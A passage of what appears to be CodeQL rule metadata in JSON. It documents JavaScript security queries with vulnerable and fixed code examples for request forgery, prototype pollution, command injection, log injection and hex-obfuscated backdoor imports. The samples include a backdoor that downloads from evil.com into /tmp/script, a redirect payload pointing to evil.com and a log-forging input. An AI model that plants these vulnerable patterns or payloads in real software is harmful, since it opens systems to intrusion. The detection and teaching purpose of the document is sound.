Restrict the input so that path traversal (\"`../`\") cannot be used to redirect the request to an unintended endpoint.\n\n## Example\nThe following example shows an HTTP request used to fetch the pre-rendered HTML body of a message. It is using the endpoint `/api/messages/ID`, which is believed to respond with a safe HTML string, to be embedded in the page:\n\n\n```javascript\nasync function loadMessage() {\n const query = new URLSearchParams(location.search);\n const url = '/api/messages/' + query.get('message_id');\n const data = await (await fetch(url)).json();\n document.getElementById('message').innerHTML = data.html;\n}\n\n```\nHowever, the format of the message ID is not checked, and an attacker can abuse this to alter the endpoint targeted by the request. If they can redirect it to an endpoint that returns an untrusted value, this leads to cross-site scripting.\n\nFor example, given the query string `message_id=../pastebin/123`, the request will end up targeting the `/api/pastebin` endpoint. 
Or if there is an open redirect on the login page, a query string like `message_id=../../login?redirect_url=https://evil.com` could give the attacker full control over the response as well.\n\nIn example below, the input has been restricted to a number so that the endpoint cannot be altered:\n\n\n```javascript\nasync function loadMessage() {\n const query = new URLSearchParams(location.search);\n const url = '/api/messages/' + Number(query.get('message_id'));\n const data = await (await fetch(url)).json();\n document.getElementById('message').innerHTML = data.html;\n}\n\n```\n\n## References\n* OWASP: [Server-side request forgery](https://cwe.mitre.org/data/definitions/918.html)\n* OWASP: [Cross-site request forgery](https://cwe.mitre.org/data/definitions/352.html)\n* Common Weakness Enumeration: [CWE-918](https://cwe.mitre.org/data/definitions/918.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-918" ], + "description" : "Making a client-to-server request with user-controlled data in the URL allows a request forgery attack\n against the client.", + "id" : "js/client-side-request-forgery", + "kind" : "path-problem", + "name" : "Client-side request forgery", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "5.0" + } + }, { + "id" : "js/remote-property-injection", + "name" : "js/remote-property-injection", + "shortDescription" : { + "text" : "Remote property injection" + }, + "fullDescription" : { + "text" : "Allowing writes to arbitrary properties of an object may lead to denial-of-service attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Remote property injection\nDynamically computing object property names from untrusted input may have multiple undesired consequences. For example, if the property access is used as part of a write, an attacker may overwrite vital properties of objects, such as `__proto__`. 
This attack is known as *prototype pollution attack* and may serve as a vehicle for denial-of-service attacks. A similar attack vector, is to replace the `toString` property of an object with a primitive. Whenever `toString` is then called on that object, either explicitly or implicitly as part of a type coercion, an exception will be raised.\n\nMoreover, if the name of an HTTP header is user-controlled, an attacker may exploit this to overwrite security-critical headers such as `Access-Control-Allow-Origin` or `Content-Security-Policy`.\n\n\n## Recommendation\nThe most common case in which prototype pollution vulnerabilities arise is when JavaScript objects are used for implementing map data structures. This case should be avoided whenever possible by using the ECMAScript 2015 `Map` instead. When this is not possible, an alternative fix is to prepend untrusted input with a marker character such as `$`, before using it in properties accesses. In this way, the attacker does not have access to built-in properties which do not start with the chosen character.\n\nWhen using user input as part of a header name, a sanitization step should be performed on the input to ensure that the name does not clash with existing header names such as `Content-Security-Policy`.\n\n\n## Example\nIn the example below, the dynamically computed property `prop` is accessed on `myObj` using a user-controlled value.\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\nvar myObj = {}\n\napp.get('/user/:id', function(req, res) {\n\tvar prop = req.query.userControlled; // BAD\n\tmyObj[prop] = function() {};\n\tconsole.log(\"Request object \" + myObj);\n});\n```\nThis is not secure since an attacker may exploit this code to overwrite the property `__proto__` with an empty function. If this happens, the concatenation in the `console.log` argument will fail with a confusing message such as \"Function.prototype.toString is not generic\". 
If the application does not properly handle this error, this scenario may result in a serious denial-of-service attack. The fix is to prepend the user-controlled string with a marker character such as `$` which will prevent arbitrary property names from being overwritten.\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\nvar myObj = {}\n\napp.get('/user/:id', function(req, res) {\n\tvar prop = \"$\" + req.query.userControlled; // GOOD\n\tmyObj[prop] = function() {};\n\tconsole.log(\"Request object \" + myObj);\n});\n```\n\n## References\n* Prototype pollution attacks: [electron](https://github.com/electron/electron/pull/9287), [lodash](https://hackerone.com/reports/310443), [hoek](https://npmjs.com/advisories/566).\n* Penetration testing report: [ header name injection attack](http://seclists.org/pen-test/2009/Mar/67)\n* npm blog post: [ dangers of square bracket notation](https://github.com/nodesecurity/eslint-plugin-security/blob/3c7522ca1be800353513282867a1034c795d9eb4/docs/the-dangers-of-square-bracket-notation.md)\n* Common Weakness Enumeration: [CWE-250](https://cwe.mitre.org/data/definitions/250.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", + "markdown" : "# Remote property injection\nDynamically computing object property names from untrusted input may have multiple undesired consequences. For example, if the property access is used as part of a write, an attacker may overwrite vital properties of objects, such as `__proto__`. This attack is known as *prototype pollution attack* and may serve as a vehicle for denial-of-service attacks. A similar attack vector, is to replace the `toString` property of an object with a primitive. 
Whenever `toString` is then called on that object, either explicitly or implicitly as part of a type coercion, an exception will be raised.\n\nMoreover, if the name of an HTTP header is user-controlled, an attacker may exploit this to overwrite security-critical headers such as `Access-Control-Allow-Origin` or `Content-Security-Policy`.\n\n\n## Recommendation\nThe most common case in which prototype pollution vulnerabilities arise is when JavaScript objects are used for implementing map data structures. This case should be avoided whenever possible by using the ECMAScript 2015 `Map` instead. When this is not possible, an alternative fix is to prepend untrusted input with a marker character such as `$`, before using it in properties accesses. In this way, the attacker does not have access to built-in properties which do not start with the chosen character.\n\nWhen using user input as part of a header name, a sanitization step should be performed on the input to ensure that the name does not clash with existing header names such as `Content-Security-Policy`.\n\n\n## Example\nIn the example below, the dynamically computed property `prop` is accessed on `myObj` using a user-controlled value.\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\nvar myObj = {}\n\napp.get('/user/:id', function(req, res) {\n\tvar prop = req.query.userControlled; // BAD\n\tmyObj[prop] = function() {};\n\tconsole.log(\"Request object \" + myObj);\n});\n```\nThis is not secure since an attacker may exploit this code to overwrite the property `__proto__` with an empty function. If this happens, the concatenation in the `console.log` argument will fail with a confusing message such as \"Function.prototype.toString is not generic\". If the application does not properly handle this error, this scenario may result in a serious denial-of-service attack. 
The fix is to prepend the user-controlled string with a marker character such as `$` which will prevent arbitrary property names from being overwritten.\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\nvar myObj = {}\n\napp.get('/user/:id', function(req, res) {\n\tvar prop = \"$\" + req.query.userControlled; // GOOD\n\tmyObj[prop] = function() {};\n\tconsole.log(\"Request object \" + myObj);\n});\n```\n\n## References\n* Prototype pollution attacks: [electron](https://github.com/electron/electron/pull/9287), [lodash](https://hackerone.com/reports/310443), [hoek](https://npmjs.com/advisories/566).\n* Penetration testing report: [ header name injection attack](http://seclists.org/pen-test/2009/Mar/67)\n* npm blog post: [ dangers of square bracket notation](https://github.com/nodesecurity/eslint-plugin-security/blob/3c7522ca1be800353513282867a1034c795d9eb4/docs/the-dangers-of-square-bracket-notation.md)\n* Common Weakness Enumeration: [CWE-250](https://cwe.mitre.org/data/definitions/250.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-250", "external/cwe/cwe-400" ], + "description" : "Allowing writes to arbitrary properties of an object may lead to\n denial-of-service attacks.", + "id" : "js/remote-property-injection", + "kind" : "path-problem", + "name" : "Remote property injection", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/http-to-file-access", + "name" : "js/http-to-file-access", + "shortDescription" : { + "text" : "Network data written to file" + }, + "fullDescription" : { + "text" : "Writing network data directly to the file system allows arbitrary file upload and might indicate a backdoor." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Network data written to file\nStoring user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\n\n## Recommendation\nExamine the highlighted code closely to ensure that it is behaving as intended.\n\n\n## Example\nThe following example shows backdoor code that downloads data from the URL `https://evil.com/script`, and stores it in the local file `/tmp/script`.\n\n\n```javascript\nvar https = require(\"https\");\nvar fs = require(\"fs\");\n\nhttps.get('https://evil.com/script', res => {\n res.on(\"data\", d => {\n fs.writeFileSync(\"/tmp/script\", d)\n })\n});\n\n```\nOther parts of the program might then assume that since `/tmp/script` is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.\n\n\n## References\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* OWASP: [Unrestricted File Upload](https://www.owasp.org/index.php/Unrestricted_File_Upload).\n* Common Weakness Enumeration: [CWE-912](https://cwe.mitre.org/data/definitions/912.html).\n* Common Weakness Enumeration: [CWE-434](https://cwe.mitre.org/data/definitions/434.html).\n", + "markdown" : "# Network data written to file\nStoring user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\n\n## Recommendation\nExamine the highlighted code closely to ensure that it is behaving as intended.\n\n\n## Example\nThe following example shows backdoor code that downloads data from the URL `https://evil.com/script`, and stores it in the local file `/tmp/script`.\n\n\n```javascript\nvar https = require(\"https\");\nvar fs 
= require(\"fs\");\n\nhttps.get('https://evil.com/script', res => {\n res.on(\"data\", d => {\n fs.writeFileSync(\"/tmp/script\", d)\n })\n});\n\n```\nOther parts of the program might then assume that since `/tmp/script` is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.\n\n\n## References\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* OWASP: [Unrestricted File Upload](https://www.owasp.org/index.php/Unrestricted_File_Upload).\n* Common Weakness Enumeration: [CWE-912](https://cwe.mitre.org/data/definitions/912.html).\n* Common Weakness Enumeration: [CWE-434](https://cwe.mitre.org/data/definitions/434.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-912", "external/cwe/cwe-434" ], + "description" : "Writing network data directly to the file system allows arbitrary file upload and might indicate a backdoor.", + "id" : "js/http-to-file-access", + "kind" : "path-problem", + "name" : "Network data written to file", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "6.3" + } + }, { + "id" : "js/indirect-command-line-injection", + "name" : "js/indirect-command-line-injection", + "shortDescription" : { + "text" : "Indirect uncontrolled command line" + }, + "fullDescription" : { + "text" : "Forwarding command-line arguments to a child process executed within a shell may indirectly introduce command-line injection vulnerabilities." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Indirect uncontrolled command line\nForwarding command-line arguments to `child_process.exec` or some other library routine that executes a system command within a shell can change the meaning of the command unexpectedly due to unescaped special characters.\n\nWhen the forwarded command-line arguments come from a parent process that has not escaped the special characters in the arguments, then the parent process may indirectly be vulnerable to command-line injection since the special characters are evaluated unexpectedly.\n\n\n## Recommendation\nIf possible, use APIs that don't run shell commands and accept command arguments as an array of strings rather than a single concatenated string. This is both safer and more portable.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nIf this approach is not viable, then add code to verify that each forwarded command-line argument is properly escaped before using it.\n\n\n## Example\nThe following wrapper script example executes another JavaScript file in a child process and forwards some command-line arguments. This is problematic because the special characters in the command-line arguments may change the meaning of the child process invocation unexpectedly. 
For instance, if one of the command-line arguments is `\"dollar$separated$name\"`, then the child process will substitute the two environment variables `$separated` and `$name` before invoking `node`.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nconst args = process.argv.slice(2);\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execSync(`node ${script} ${args.join(' ')}`); // BAD\n\n```\nIf another program uses `child_process.execFile` to invoke the above wrapper script with input from a remote user, then there may be a command-line injection vulnerability. This may be surprising, since a command-line invocation with `child_process.execFile` is generally considered safe. But in this case, the remote user input is simply forwarded to the problematic `process.exec` call in the wrapper script.\n\nTo guard against this, use an API that does not perform environment variable substitution, such as `child_process.execFile`:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nconst args = process.argv.slice(2);\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execFileSync('node', [script].concat(args)); // GOOD\n\n```\nIf you want to allow the user to specify other options to `node`, you can use a library like `shell-quote` to parse the user input into an array of arguments without risking command injection:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n shellQuote = require(\"shell-quote\");\n\nconst args = process.argv.slice(2);\nlet nodeOpts = '';\nif (args[0] === '--node-opts') {\n nodeOpts = args[1];\n args.splice(0, 2);\n}\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execFileSync('node', shellQuote.parse(nodeOpts).concat(script).concat(args)); // GOOD\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: 
[CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n", + "markdown" : "# Indirect uncontrolled command line\nForwarding command-line arguments to `child_process.exec` or some other library routine that executes a system command within a shell can change the meaning of the command unexpectedly due to unescaped special characters.\n\nWhen the forwarded command-line arguments come from a parent process that has not escaped the special characters in the arguments, then the parent process may indirectly be vulnerable to command-line injection since the special characters are evaluated unexpectedly.\n\n\n## Recommendation\nIf possible, use APIs that don't run shell commands and accept command arguments as an array of strings rather than a single concatenated string. This is both safer and more portable.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nIf this approach is not viable, then add code to verify that each forwarded command-line argument is properly escaped before using it.\n\n\n## Example\nThe following wrapper script example executes another JavaScript file in a child process and forwards some command-line arguments. This is problematic because the special characters in the command-line arguments may change the meaning of the child process invocation unexpectedly. 
For instance, if one of the command-line arguments is `\"dollar$separated$name\"`, then the child process will substitute the two environment variables `$separated` and `$name` before invoking `node`.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nconst args = process.argv.slice(2);\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execSync(`node ${script} ${args.join(' ')}`); // BAD\n\n```\nIf another program uses `child_process.execFile` to invoke the above wrapper script with input from a remote user, then there may be a command-line injection vulnerability. This may be surprising, since a command-line invocation with `child_process.execFile` is generally considered safe. But in this case, the remote user input is simply forwarded to the problematic `process.exec` call in the wrapper script.\n\nTo guard against this, use an API that does not perform environment variable substitution, such as `child_process.execFile`:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nconst args = process.argv.slice(2);\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execFileSync('node', [script].concat(args)); // GOOD\n\n```\nIf you want to allow the user to specify other options to `node`, you can use a library like `shell-quote` to parse the user input into an array of arguments without risking command injection:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n shellQuote = require(\"shell-quote\");\n\nconst args = process.argv.slice(2);\nlet nodeOpts = '';\nif (args[0] === '--node-opts') {\n nodeOpts = args[1];\n args.splice(0, 2);\n}\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execFileSync('node', shellQuote.parse(nodeOpts).concat(script).concat(args)); // GOOD\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: 
[CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-078", "external/cwe/cwe-088" ], + "description" : "Forwarding command-line arguments to a child process\n executed within a shell may indirectly introduce\n command-line injection vulnerabilities.", + "id" : "js/indirect-command-line-injection", + "kind" : "path-problem", + "name" : "Indirect uncontrolled command line", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "6.3" + } + }, { + "id" : "js/log-injection", + "name" : "js/log-injection", + "shortDescription" : { + "text" : "Log injection" + }, + "fullDescription" : { + "text" : "Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Log injection\nIf unsanitized user input is written to a log entry, a malicious user may be able to forge new log entries.\n\nForgery can occur if a user provides some input with characters that are interpreted when the log output is displayed. If the log is displayed as a plain text file, then new line characters can be used by a malicious user. If the log is displayed as HTML, then arbitrary HTML may be included to spoof log entries.\n\n\n## Recommendation\nUser input should be suitably sanitized before it is logged.\n\nIf the log entries are in plain text then line breaks should be removed from user input, using `String.prototype.replace` or similar. 
Care should also be taken that user input is clearly marked in log entries.\n\nFor log entries that will be displayed in HTML, user input should be HTML-encoded before being logged, to prevent forgery and other forms of HTML injection.\n\n\n## Example\nIn the first example, a username, provided by the user, is logged using \\`console.info\\`. In the first case, it is logged without any sanitization. In the second case, the username is used to build an error that is logged using \\`console.error\\`. If a malicious user provides \\`username=Guest%0a\\[INFO\\]+User:+Admin%0a\\` as a username parameter, the log entry will be splitted in two different lines, where the second line will be \\`\\[INFO\\]+User:+Admin\\`.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n let q = url.parse(req.url, true);\n\n console.info(`[INFO] User: ${q.query.username}`); // BAD: User input logged as-is\n})\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\nIn the second example, `String.prototype.replace` is used to ensure no line endings are present in the user input.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n let q = url.parse(req.url, true);\n\n // GOOD: remove newlines from user controlled input before logging\n let username = q.query.username.replace(/\\n|\\r/g, \"\");\n\n console.info(`[INFO] User: ${username}`);\n});\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\n\n## References\n* OWASP: [Log Injection](https://www.owasp.org/index.php/Log_Injection).\n* Common Weakness Enumeration: [CWE-117](https://cwe.mitre.org/data/definitions/117.html).\n", + "markdown" : "# Log injection\nIf unsanitized user input is written to a log entry, a malicious user may be able to forge new log entries.\n\nForgery can occur if a user provides some input with characters that are interpreted when the log output is 
displayed. If the log is displayed as a plain text file, then new line characters can be used by a malicious user. If the log is displayed as HTML, then arbitrary HTML may be included to spoof log entries.\n\n\n## Recommendation\nUser input should be suitably sanitized before it is logged.\n\nIf the log entries are in plain text then line breaks should be removed from user input, using `String.prototype.replace` or similar. Care should also be taken that user input is clearly marked in log entries.\n\nFor log entries that will be displayed in HTML, user input should be HTML-encoded before being logged, to prevent forgery and other forms of HTML injection.\n\n\n## Example\nIn the first example, a username, provided by the user, is logged using \\`console.info\\`. In the first case, it is logged without any sanitization. In the second case, the username is used to build an error that is logged using \\`console.error\\`. If a malicious user provides \\`username=Guest%0a\\[INFO\\]+User:+Admin%0a\\` as a username parameter, the log entry will be splitted in two different lines, where the second line will be \\`\\[INFO\\]+User:+Admin\\`.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n let q = url.parse(req.url, true);\n\n console.info(`[INFO] User: ${q.query.username}`); // BAD: User input logged as-is\n})\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\nIn the second example, `String.prototype.replace` is used to ensure no line endings are present in the user input.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n let q = url.parse(req.url, true);\n\n // GOOD: remove newlines from user controlled input before logging\n let username = q.query.username.replace(/\\n|\\r/g, \"\");\n\n console.info(`[INFO] User: ${username}`);\n});\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\n\n## 
References\n* OWASP: [Log Injection](https://www.owasp.org/index.php/Log_Injection).\n* Common Weakness Enumeration: [CWE-117](https://cwe.mitre.org/data/definitions/117.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-117" ], + "description" : "Building log entries from user-controlled sources is vulnerable to\n insertion of forged log entries by a malicious user.", + "id" : "js/log-injection", + "kind" : "path-problem", + "name" : "Log injection", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "7.8" + } + }, { + "id" : "js/password-in-configuration-file", + "name" : "js/password-in-configuration-file", + "shortDescription" : { + "text" : "Password in configuration file" + }, + "fullDescription" : { + "text" : "Storing unencrypted passwords in configuration files is unsafe." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Password in configuration file\nStoring a plaintext password in a configuration file allows anyone who can read the file to access the password-protected resources. Therefore it is a common attack vector.\n\n\n## Recommendation\nPasswords stored in configuration files should always be encrypted.\n\n\n## References\n* Common Weakness Enumeration: [CWE-256](https://cwe.mitre.org/data/definitions/256.html).\n* Common Weakness Enumeration: [CWE-260](https://cwe.mitre.org/data/definitions/260.html).\n* Common Weakness Enumeration: [CWE-313](https://cwe.mitre.org/data/definitions/313.html).\n* Common Weakness Enumeration: [CWE-522](https://cwe.mitre.org/data/definitions/522.html).\n", + "markdown" : "# Password in configuration file\nStoring a plaintext password in a configuration file allows anyone who can read the file to access the password-protected resources. 
Therefore it is a common attack vector.\n\n\n## Recommendation\nPasswords stored in configuration files should always be encrypted.\n\n\n## References\n* Common Weakness Enumeration: [CWE-256](https://cwe.mitre.org/data/definitions/256.html).\n* Common Weakness Enumeration: [CWE-260](https://cwe.mitre.org/data/definitions/260.html).\n* Common Weakness Enumeration: [CWE-313](https://cwe.mitre.org/data/definitions/313.html).\n* Common Weakness Enumeration: [CWE-522](https://cwe.mitre.org/data/definitions/522.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-256", "external/cwe/cwe-260", "external/cwe/cwe-313", "external/cwe/cwe-522" ], + "description" : "Storing unencrypted passwords in configuration files is unsafe.", + "id" : "js/password-in-configuration-file", + "kind" : "problem", + "name" : "Password in configuration file", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/empty-password-in-configuration-file", + "name" : "js/empty-password-in-configuration-file", + "shortDescription" : { + "text" : "Empty password in configuration file" + }, + "fullDescription" : { + "text" : "Failing to set a password reduces the security of your code." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Empty password in configuration file\nThe use of an empty string as a password in a configuration file is not secure.\n\n\n## Recommendation\nChoose a strong password and encrypt it if it has to be stored in a configuration file.\n\n\n## References\n* Common Weakness Enumeration: [CWE-258](https://cwe.mitre.org/data/definitions/258.html).\n* Common Weakness Enumeration: [CWE-862](https://cwe.mitre.org/data/definitions/862.html).\n", + "markdown" : "# Empty password in configuration file\nThe use of an empty string as a password in a configuration file is not secure.\n\n\n## Recommendation\nChoose a strong password and encrypt it if it has to be stored in a configuration file.\n\n\n## References\n* Common Weakness Enumeration: [CWE-258](https://cwe.mitre.org/data/definitions/258.html).\n* Common Weakness Enumeration: [CWE-862](https://cwe.mitre.org/data/definitions/862.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-258", "external/cwe/cwe-862" ], + "description" : "Failing to set a password reduces the security of your code.", + "id" : "js/empty-password-in-configuration-file", + "kind" : "problem", + "name" : "Empty password in configuration file", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/hardcoded-data-interpreted-as-code", + "name" : "js/hardcoded-data-interpreted-as-code", + "shortDescription" : { + "text" : "Hard-coded data interpreted as code" + }, + "fullDescription" : { + "text" : "Transforming hard-coded data (such as hexadecimal constants) into code to be executed is a technique often associated with backdoors and should be avoided." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Hard-coded data interpreted as code\nInterpreting hard-coded data, such as string literals containing hexadecimal numbers, as code or as an import path is typical of malicious backdoor code that has been implanted into an otherwise trusted code base and is trying to hide its true purpose from casual readers or automated scanning tools.\n\n\n## Recommendation\nExamine the code in question carefully to ascertain its provenance and its true purpose. If the code is benign, it should always be possible to rewrite it without relying on dynamically interpreting data as code, improving both clarity and safety.\n\n\n## Example\nAs an example of malicious code using this obfuscation technique, consider the following simplified version of a snippet of backdoor code that was discovered in a dependency of the popular `event-stream` npm package:\n\n\n```javascript\nvar r = require;\n\nfunction e(r) {\n return Buffer.from(r, \"hex\").toString()\n}\n\n// BAD: hexadecimal constant decoded and interpreted as import path\nvar n = r(e(\"2e2f746573742f64617461\"));\n\n```\nWhile this shows only the first few lines of code, it already looks very suspicious since it takes a hard-coded string literal, hex-decodes it and then uses it as an import path. 
The only reason to do so is to hide the name of the file being imported.\n\n\n## References\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* The npm Blog: [Details about the event-stream incident](https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident).\n* Common Weakness Enumeration: [CWE-506](https://cwe.mitre.org/data/definitions/506.html).\n", + "markdown" : "# Hard-coded data interpreted as code\nInterpreting hard-coded data, such as string literals containing hexadecimal numbers, as code or as an import path is typical of malicious backdoor code that has been implanted into an otherwise trusted code base and is trying to hide its true purpose from casual readers or automated scanning tools.\n\n\n## Recommendation\nExamine the code in question carefully to ascertain its provenance and its true purpose. If the code is benign, it should always be possible to rewrite it without relying on dynamically interpreting data as code, improving both clarity and safety.\n\n\n## Example\nAs an example of malicious code using this obfuscation technique, consider the following simplified version of a snippet of backdoor code that was discovered in a dependency of the popular `event-stream` npm package:\n\n\n```javascript\nvar r = require;\n\nfunction e(r) {\n return Buffer.from(r, \"hex\").toString()\n}\n\n// BAD: hexadecimal constant decoded and interpreted as import path\nvar n = r(e(\"2e2f746573742f64617461\"));\n\n```\nWhile this shows only the first few lines of code, it already looks very suspicious since it takes a hard-coded string literal, hex-decodes it and then uses it as an import path. 
The only reason to do so is to hide the name of the file being imported.\n\n\n## References\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* The npm Blog: [Details about the event-stream incident](https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident).\n* Common Weakness Enumeration: [CWE-506](https://cwe.mitre.org/data/definitions/506.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-506" ], + "description" : "Transforming hard-coded data (such as hexadecimal constants) into code\n to be executed is a technique often associated with backdoors and should\n be avoided.", + "id" : "js/hardcoded-data-interpreted-as-code", + "kind" : "path-problem", + "name" : "Hard-coded data interpreted as code", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "9.1" + } + }, { + "id" : "js/user-controlled-bypass", + "name" : "js/user-controlled-bypass", + "shortDescription" : { + "text" : "User-controlled bypass of security check" + }, + "fullDescription" : { + "text" : "Conditions that the user controls are not suited for making security-related decisions." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# User-controlled bypass of security check\nUsing user-controlled data in a permissions check may allow a user to gain unauthorized access to protected functionality or data.\n\n\n## Recommendation\nWhen checking whether a user is authorized for a particular activity, do not use data that is entirely controlled by that user in the permissions check. If necessary, always validate the input, ideally against a fixed list of expected values.\n\nSimilarly, do not decide which permission to check for, based on user data. In particular, avoid using computation to decide which permissions to check for. 
Use fixed permissions for particular actions, rather than generating the permission to check for.\n\n\n## Example\nIn this example, we have a server that shows private information for a user, based on the request parameter `userId`. For privacy reasons, users may only view their own private information, so the server checks that the request parameter `userId` matches a cookie value for the user who is logged in.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n if (req.cookies.loggedInUserId !== req.params.userId) {\n // BAD: login decision made based on user controlled data\n requireLogin();\n } else {\n // ... show private information\n }\n\n});\n\n```\nThis security check is, however, insufficient since an attacker can craft their cookie values to match those of any user. To prevent this, the server can cryptographically sign the security critical cookie values:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n if (req.signedCookies.loggedInUserId !== req.params.userId) {\n // GOOD: login decision made based on server controlled data\n requireLogin();\n } else {\n // ... show private information\n }\n\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-807](https://cwe.mitre.org/data/definitions/807.html).\n* Common Weakness Enumeration: [CWE-290](https://cwe.mitre.org/data/definitions/290.html).\n", + "markdown" : "# User-controlled bypass of security check\nUsing user-controlled data in a permissions check may allow a user to gain unauthorized access to protected functionality or data.\n\n\n## Recommendation\nWhen checking whether a user is authorized for a particular activity, do not use data that is entirely controlled by that user in the permissions check. 
If necessary, always validate the input, ideally against a fixed list of expected values.\n\nSimilarly, do not decide which permission to check for, based on user data. In particular, avoid using computation to decide which permissions to check for. Use fixed permissions for particular actions, rather than generating the permission to check for.\n\n\n## Example\nIn this example, we have a server that shows private information for a user, based on the request parameter `userId`. For privacy reasons, users may only view their own private information, so the server checks that the request parameter `userId` matches a cookie value for the user who is logged in.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n if (req.cookies.loggedInUserId !== req.params.userId) {\n // BAD: login decision made based on user controlled data\n requireLogin();\n } else {\n // ... show private information\n }\n\n});\n\n```\nThis security check is, however, insufficient since an attacker can craft their cookie values to match those of any user. To prevent this, the server can cryptographically sign the security critical cookie values:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n if (req.signedCookies.loggedInUserId !== req.params.userId) {\n // GOOD: login decision made based on server controlled data\n requireLogin();\n } else {\n // ... 
